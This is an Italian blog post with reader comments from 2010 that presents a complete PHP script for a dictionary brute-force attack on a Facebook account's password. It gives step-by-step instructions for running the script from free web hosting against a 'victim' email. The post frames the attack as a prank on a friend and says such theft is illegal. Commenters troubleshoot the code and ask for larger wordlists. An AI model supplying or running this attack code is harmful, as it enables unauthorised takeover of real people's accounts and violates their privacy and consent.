• Contest
  • Articoli
  • Commenti
  • RSS
  • Links
Contest: La Squadra del cuore

    L'iscrizione al concorso termina fra:

    Vinci 2 biglietti per la tua squadra del cuore!




Ultimi articoli Inseriti
  • Kolibri, il piu piccolo sistema operativo
  • Streaming serie A 25esima Giornata e Siena Napoli
  • Inserie ombre ad immagini con Photoshop
  • Roma Palermo e Sampdoria Fiorentina in streaming
Ultimi Commenti
  • Cesare in Windows è piu sicuro di un mac os …
  • mapo in Privilege escalation su tutti i sis…
  • Lorenzo in Hackerare un rete wireless con Wind…
  • Joseph in Creare una password con la propria …
RSS

    Vuoi restare sempre aggiornato? Iscriviti ai nostri Feed Rss

    -

links
    Il Bloggatore - Clshack -
    Il tuo sito qui?
  • Home
  • Info
  • GF10 Diretta
  • Streaming serie A
  • Sicurezza Informatica
  • Facebook

Scoprire e trovare password di Facebook

icon1 Articolo letto 3449 volte dal 01 2nd, 2010 | Condividi

Ancora una volta siamo qui a parlare del social network piu famoso al mondo, facebook, questa volta con uno programma ( Script php ) per scoprire e trovare le password facebook di un vostro amico.
Secondo la legge Italiana rubare una password sia di facebook che di qualsiasi altro utente equivale ad un reato e per tanto è perseguibile per legge.
Quindi a meno che non vogliate fare uno scherzo ad un vostro amico, e siete sicuri di non beccarvi una inutile denuncia penale, ecco di seguito lo script completo:


<?
################################
# Scoprire password di facebook
# Autore ignoto
# modded: by KinG-LioN http://www.kinglion.it
################################
set_time_limit(0);
$username =”kinglion@kinglion.it”; // Email vittima
$dictionary =”dizionario.txt”; // Dizionario

function kontrol($kullaniciadi,$sifre){
$useragent = “Opera/9.21 (Windows NT 5.1; U; tr)”;
$data = “email=$kullaniciadi&pass=$sifre&login=Login” ;
$ch = curl_init(‘[url]https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php’[/url]);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookie.txt’);
curl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookie.txt’);
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi(“Home</title>”,$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo “$dictionary is not file”;exit;}
$lines=file($dictionary);
echo “Attack Starting..
“;
sleep(10);
echo “Attacco iniziato, attendi qualche minuto..
“;
foreach($lines as $line){
$line=str_replace(“\r”,”",$line);
$line=str_replace(“\n”,”",$line);
if(kontrol($username,$line)){echo “<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line – P
assword found : $line</font>
“;$fp=fopen(‘cookie.txt’,'w’);fwrite($fp,”);exit;}
else{echo “<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line – Password non trovata :
$line</font>
“;}
}
?>

Per tutti coloro che sono meno esperti, ecco che vi spiego come usare lo script.
Come prima cosa avete bisogno di uno spazio web, ad esempio potete registrarne uno gratuito su Altervista.org del tipo kinglion.altervista.org.
Il secondo passo da fare è quello di copiare il codice e salvarlo con estenzione .php
Apriamo il blocco notes scriviamo il codice, poi facciamo file, salva con nome, nel menu a discesa selezioniamo tutti i file e salviamo come kinglion.php
Il terzo passo è di scaricare il dizionario da qua.
Uppare sia il file kinglion.php che il dizionario e lanciare lo script da URL.

Questo articolo è stato scritto da Pasquale Venditto di kinglion.it. Ne è vietata la riproduzione anche parziale del contenuto.

32 commenti »

  1. cyber Says:
    gennaio 2nd, 2010 at 10:19

    il dizionario scaricato non ha il formato .txt ma .j9d

  2. KinG-LioN Says:
    gennaio 2nd, 2010 at 10:32

    Si biusogna aprirlo con winrar ( http://www.winrar.it/prelievo.php ) ed estrarne il contenuto

  3. cyber Says:
    gennaio 2nd, 2010 at 10:36

    non lo apre…. puoi upparlo in txt direttamente?

  4. KinG-LioN Says:
    gennaio 2nd, 2010 at 10:59

    ok fatto, ora al primo link ( quello nell’articolo ) puoi scaricare un file ZIP contenente il dizionario in formato txt normale

  5. nic91 Says:
    gennaio 2nd, 2010 at 11:40

    non so come usare lo script (non sono un esperto), mi puoi dare una mano?
    ho creato un mio spazio web su altervista, creato il file kinglion.php e scaricato il dizionario da megaupload.
    ora come faccio a “Uppare sia il file kinglion.php che il dizionario e lanciare lo script da URL”?

    poi cosa dovrebbe succedere?

    scusa la mia ignoranza, grazie 1000!

  6. KinG-LioN Says:
    gennaio 2nd, 2010 at 13:11

    la variabile alla terza riga come vedi ( $dictionary =”dizionario.txt”; ) richiama un file dizionario.txt
    Inserisci tale file chiamato dizionario.txt nella stessa cartella dove risiede lo script e lancia il percorso tipo: tuosito.altervista.org/SCRIPT.PHP ed attendi i risultati.
    Se da qualche errore è probabile che devi cambiare e riscrivere a mano tutti gli “ e gli ‘ dello script xke wordpress usa una codifica diversa

  7. gogo Says:
    gennaio 2nd, 2010 at 17:37

    sarebbe un brute force..

  8. KinG-LioN Says:
    gennaio 2nd, 2010 at 17:45

    esattamente un brute force per facebook

  9. dexter Says:
    gennaio 2nd, 2010 at 18:52

    è comunque inutile, altervista ha un blocco automatico contro i brute…

  10. Alessio Dalla Piazza Says:
    gennaio 2nd, 2010 at 21:41

    e poi su altervista…

    /*
    non funziona …
    ce un limite di 60 secondi se non ricordo male … bisogna fare in altro modo per eseguire lo script all’infinito ;)

    */

  11. AngelDany Says:
    gennaio 4th, 2010 at 14:31

    da un errore di sintassi…non funziona…come mai=?

  12. marco_ask Says:
    gennaio 4th, 2010 at 22:47

    mi da

    Parse error: syntax error, unexpected ‘@’ in [...]/kinglion.php on line 8

  13. KinG-LioN Says:
    gennaio 5th, 2010 at 01:47

    davvero strano, da un erroe sulla linea 8 ossia $username =”kinglion@kinglion.it”; // Email vittima in pratica dice che trova una @ in piu… avete modificato come vi ho detto tutte le ” ?
    xke a me gira benissimo su spazio aruba

  14. h4cK3r0n3 Says:
    gennaio 5th, 2010 at 10:03

    King ma che guide butti giù… Un dictionary attack per fb…

  15. KinG-LioN Says:
    gennaio 5th, 2010 at 12:21

    xke matteo non te gusta?

  16. AngelDany Says:
    gennaio 7th, 2010 at 19:55

    anche provando a cambiare tutte le ” non funziona..strano..

  17. Mirkixeddu Says:
    gennaio 10th, 2010 at 14:23

    a me da questo:

    Parse error: syntax error, unexpected ‘[‘ in …/mirkixeddu.php on line 14

  18. AngelDany Says:
    gennaio 10th, 2010 at 16:01

    ssiis anche a me una volta modificato tutte le ” mi da lo stesso tuo errore…

  19. Superson Says:
    gennaio 10th, 2010 at 23:55

    Ciao KinG-LioN ho scaricato lo script,volevo farlo partire da locale con easyphp ma non và,suppongo che non si possa giusto?Ma comuqnue agli altri funziona???!Un saluto…

  20. -iacopo94- Says:
    gennaio 12th, 2010 at 15:03

    Secondo me è un attacco pessimo!
    Basta avere un carattere speciale nella password o un numero e l’attacco fallirà!
    Se la password da scoprire non è contenuta nel dizionario, l’attacco non funziona. In pratica può essere utile solo per il 5% delle persone, che mette password molto banali.

  21. luca Says:
    gennaio 14th, 2010 at 13:47

    errore linea 42 questo il codice fino alla fine dovè l’errore??

    else{echo “[-] username:$username , password:$line – P
    assword non trovata : $line
    “}
    }
    ?>

  22. sevob Says:
    gennaio 14th, 2010 at 19:25

    posso sostituire il file dictionary.txt con un altro, stesso nome, ma più dettagliato?

  23. sevob Says:
    gennaio 14th, 2010 at 19:38

    p.s. non parte niente… mi visualizza il php come se fosse un file txt…

  24. redevilduil Says:
    gennaio 16th, 2010 at 23:57

    $username =”kinglion@kinglion.it”; come potrebbe mai funzionare cosi ? bho.. provate
    $username =\”kinglion@kinglion.it\”;

  25. fabio Says:
    gennaio 17th, 2010 at 20:31

    x la cronaca:
    per far funzionare lo script bisogna sostituire:
    i doppi apici inclinati a destra : ”
    i doppi apici inclinati a sinistra : “
    con i doppi apici standard : ”

    In seguito sostituire:
    i singoli apici inclinati a sinistra: ‘
    i singoli apici inclinati a destra: ’
    con il singolo apice standard: ‘

    In questo modo non dovrebbe + dare problemi di sintassi.

    Cmq bisognerebbe trovare un dizionario + completo per un serio brute force. Sapete dove si può scaricare???

  26. fabio Says:
    gennaio 17th, 2010 at 20:39

    e cmq non riconosce la password anche se è presente nel dizionario! io ho provato con la mia mail e la mia password e non l’ha riconosciuta!

  27. dexter Says:
    febbraio 2nd, 2010 at 23:19

    ma ovvio facebook usa un sistema che blocca questi attacchi vero king?

  28. MANERO478 Says:
    febbraio 7th, 2010 at 17:17

    allora a sto punto attendo esiti
    diversi…salute a tutti

  29. KinG-LioN Says:
    febbraio 10th, 2010 at 06:59

    Si dexter, facebook ora usa un sistema captcha per evitare questi attacchi.

  30. Paolo Says:
    febbraio 13th, 2010 at 19:44

    Ci sono molti errori nel codice. Non so se lo hai fatto appositamente per i meno esperti e comunque a quanto pare, le virgolette ” vengono sostituite da ” che sono completamente diverse infatti appare l’errore in php. Penso che sia per colpa dei css del cms. Ciao

  31. Paolo Says:
    febbraio 13th, 2010 at 19:54

    se vi da il problema
    Parse error: syntax error, unexpected ‘@’ in [...]/kinglion.php on line 8

    è perchè dovete sostituire gli apici di wordpress ” in quelli normali ”

    ciao

  32. BlackLight Says:
    febbraio 15th, 2010 at 02:47

    Tutto ciò è uno scherzo vero..?
    Sì, non può che essere uno scherzo, fra l’altro di pessimo gusto. Non si può fare informatica in modo così dozzinale propinando queste emerite stronzate ai lamer King. E fra l’altro, che spazio web e spazio web? Lo stesso identico attacco lo fai pure in locale, con uno script Bash che richiama cURL e un qualsiasi dizionario in txt. Già di suo è una cosa altamente da coglioni fare una cosa del genere. È doppiamente da coglioni considerando che la probabilità di successo, come qualcuno giustamente diceva, è intorno al 5% se non inferiore. Triplamente da coglioni farlo con uno script PHP da uno spazio web, con il rischio di generare un puttanaio di traffico e vedersi, nella migliore delle ipotesi, il proprio account web sospeso.

RSS feed dei commenti a questo articolo. TrackBack URL

Lascia un commento


    Scoprire password di facebook
    Craccare una rete Wireless con Windows e Backtrack
    Craccare una rete Wireless con Windows 7, XP o Vista
    Internet gratis da cellulare
    Temi per Windows 7 e vista

    kinglion.it on Facebook



  • Applicazioni e siti Online
  • Applicazioni Facebook
  • Bufale
  • Cellulari e Consolle
  • Contest
  • Facebook
  • giochi
  • Gnu/Linux
  • Hacking
  • Informatica
  • Macintosh
  • News
  • Nostri Software
  • Photoshop
  • Programmazione
  • Promozioni
  • Pronostici serie A
  • SEO
  • Sicurezza Informatica
  • Software
  • Streaming
  • Tatuaggi – Tattoo
  • trucchi
  • Video
  • Windows
  • Wordpress

Articoli piu letti
  • Film erotici porno in streaming su megavideo (24290)
  • Creare un Freezer per Facebook in Visual Basic 6 (15592)
  • Grande Fratello 10 gratis in diretta streaming (7191)
  • Motore di ricerca per codici sorgenti (5569)
  • Craccare reti wi-fi wireless WPA con windows (4310)
  • Scoprire e trovare password di Facebook (3449)
  • Bloccare hackerare un contatto MSN - Freezer (3021)
  • Guida al linguaggio FBML di Facebook (2457)
  • Navigare gratis in Internet col cellulare (2036)
  • Creare link esterni in applicazioni facebook (1891)

© Copyright kinglion.it 2010. All rights reserved. | Grafica by Elegant Themes e KinG-LioN | Cms by Wordpress